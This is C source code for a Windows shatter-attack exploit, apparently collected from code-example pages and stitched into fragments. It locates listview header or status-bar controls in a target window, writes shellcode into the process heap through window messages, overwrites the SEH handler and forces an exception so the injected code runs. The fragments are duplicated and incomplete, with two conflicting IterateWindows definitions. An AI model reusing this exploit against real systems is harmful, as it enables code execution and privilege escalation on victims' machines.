int main(int argc, char *argv[])
{
 
   HMODULE hMod;
   DWORD ProcAddr;
   long x;
	

   printf("%% Playing with status bar messages\n");
   printf("%% [email protected]\n\n");

   if (argc == 2)
	   sscanf(argv[1],"%lx",&heapaddr);	// Oddity

   printf("%% Using base heap address...0x%xh\n",heapaddr);
   printf("+ Finding %s Window...\n",tWindow);
   mainhWnd = (long)FindWindow(NULL,tWindow);

   if(mainhWnd == NULL)
   {
      printf("+ Couldn't Find %s Window\n",tWindow);
      return 0;
   }
   printf("+ Found Main Window At......0x%xh\n",mainhWnd);
   IterateWindows(mainhWnd);
   printf("+ Done...\n");
   
   return 0;
}
Beispiel #2
0
void IterateWindows(long hWnd)
{
   long childhWnd,looper;
   childhWnd = GetNextWindow(hWnd,GW_CHILD);
   while (childhWnd != NULL)
   {
      IterateWindows(childhWnd);
      childhWnd = GetNextWindow(childhWnd ,GW_HWNDNEXT);
   }
   hLVControl = hWnd;
   hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0);
   if(hHdrControl != NULL)
   {
      // Found a Listview Window with a Header
      printf("+ Found listview window..0x%xh\n",hLVControl);
      printf("+ Found lvheader window..0x%xh\n",hHdrControl);
      // Inject shellcode to known address
      printf("+ Sending shellcode to...0x%xh\n",shellcodeaddr);
      for (looper=0;looper<sizeof(exploit);looper++)
         doWrite((long) exploit[looper],(shellcodeaddr + looper));
      // Overwrite SEH
      printf("+ Overwriting Top SEH....0x%xh\n",sehHandler);
      doWrite(((shellcodeaddr) & 0xff),sehHandler);
      doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1);
      doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2);
      doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3);
      // Cause exception
      printf("+ Forcing Unhandled Exception\n");
      SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1);
      printf("+ Done...\n");
      exit(0);
   }
void IterateWindows(long hWnd)
{
   
	long childhWnd,looper;

	childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
	while (childhWnd != NULL)
	{
		IterateWindows(childhWnd);
		childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
	}

	GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
	if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
	{

		// Find Heap Address
		BruteForceHeap((HWND) hWnd);

		// Inject shellcode to known address
		printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
		for (looper=0;looper<sizeof(exploit);looper++)
		 doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
		// Overwrite SEH
		printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);

		doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
		doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
		// Cause exception
		printf("+ Forcing Unhandled Exception\n");
		SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
		printf("+ Done...\n");
		exit(0);
	}